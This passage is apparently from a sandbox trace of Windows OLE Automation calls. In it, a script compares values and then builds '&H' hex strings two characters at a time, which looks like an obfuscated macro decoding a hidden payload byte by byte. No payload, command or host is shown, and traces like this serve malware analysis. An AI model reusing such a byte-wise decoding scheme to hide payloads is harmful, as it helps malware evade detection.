dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.458] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.459] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x1 [0103.460] VarCmp (pvarLeft=0x19790c, pvarRight=0x1978fc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0103.550] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.550] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.550] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.551] VarBstrCat (in: bstrLeft="&Ha", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.551] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.551] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.551] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.551] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.551] VarBstrCat (in: bstrLeft="&Ha", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.551] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.551] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.551] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.552] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.552] VarBstrCat (in: bstrLeft="&Hd", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.552] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.552] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.552] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.552] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.552] VarBstrCat (in: bstrLeft="&H5", bstrRight="4", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.552] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.552] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.553] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.553] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.553] VarBstrCat (in: bstrLeft="&Hb", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.553] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.553] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.553] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.553] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.553] VarBstrCat (in: bstrLeft="&H5", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.553] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.553] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.554] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.554] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.554] VarBstrCat (in: bstrLeft="&H0", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.554] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.554] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.554] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.554] VarBstrCat (in: bstrLeft="&H", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.554] VarBstrCat (in: bstrLeft="&H7", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.554] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.555] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.555] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.555] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.555] VarBstrCat (in: bstrLeft="&He", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.555] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.555] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.555] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.555] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.555] VarBstrCat (in: bstrLeft="&H8", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.555] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.556] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.556] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.556] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.556] VarBstrCat (in: bstrLeft="&Hd", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.556] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.556] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.556] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.556] VarBstrCat (in: bstrLeft="&H", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.556] VarBstrCat (in: bstrLeft="&H3", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.556] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.556] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.557] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.557] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.557] VarBstrCat (in: bstrLeft="&H6", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.557] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.557] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.557] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.557] VarBstrCat (in: bstrLeft="&H", bstrRight="b", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.557] VarBstrCat (in: bstrLeft="&Hb", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.557] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.557] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.558] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.558] VarBstrCat (in: bstrLeft="&H", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.558] VarBstrCat (in: bstrLeft="&H2", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.558] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.558] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.558] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.558] VarBstrCat (in: bstrLeft="&H", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.558] VarBstrCat (in: bstrLeft="&H6", bstrRight="2", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.558] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.558] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.559] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.559] VarBstrCat (in: bstrLeft="&H", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.559] VarBstrCat (in: bstrLeft="&Ha", bstrRight="7", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.559] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.559] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.559] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.559] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.559] VarBstrCat (in: bstrLeft="&H0", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.559] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.560] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.560] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.560] VarBstrCat (in: bstrLeft="&H", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.560] VarBstrCat (in: bstrLeft="&H0", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.560] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.560] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.560] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.560] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.560] VarBstrCat (in: bstrLeft="&He", bstrRight="a", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.560] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.561] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.561] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.561] VarBstrCat (in: bstrLeft="&H", bstrRight="5", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.561] VarBstrCat (in: bstrLeft="&H5", bstrRight="6", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.561] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.561] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.561] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.561] VarBstrCat (in: bstrLeft="&H", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.561] VarBstrCat (in: bstrLeft="&Hd", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.561] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.562] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.562] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.562] VarBstrCat (in: bstrLeft="&H", bstrRight="9", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.562] VarBstrCat (in: bstrLeft="&H9", bstrRight="0", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.562] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.562] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.562] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.562] VarBstrCat (in: bstrLeft="&H", bstrRight="8", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.562] VarBstrCat (in: bstrLeft="&H8", bstrRight="1", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.562] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.563] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.563] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.563] VarBstrCat (in: bstrLeft="&H", bstrRight="e", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.563] VarBstrCat (in: bstrLeft="&He", bstrRight="d", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.563] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.563] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.563] VarAdd (in: pvarLeft=0x197b94, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.563] VarBstrCat (in: bstrLeft="&H", bstrRight="c", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.563] VarBstrCat (in: bstrLeft="&Hc", bstrRight="3", pbstrResult=0x197ab8 | out: pbstrResult=0x197ab8) returned 0x0 [0103.563] VarSub (in: pvarLeft=0x197b10, pvarRight=0x197b20, pvarResult=0x197b00 | out: pvarResult=0x197b00) returned 0x0 [0103.566] VarAdd (in: pvarLeft=0x197a34, pvarRight=0x197a44, pvarResult=0x197a24 | out: pvarResult=0x197a24) returned 0x0 [0103.566] VarAdd (in: 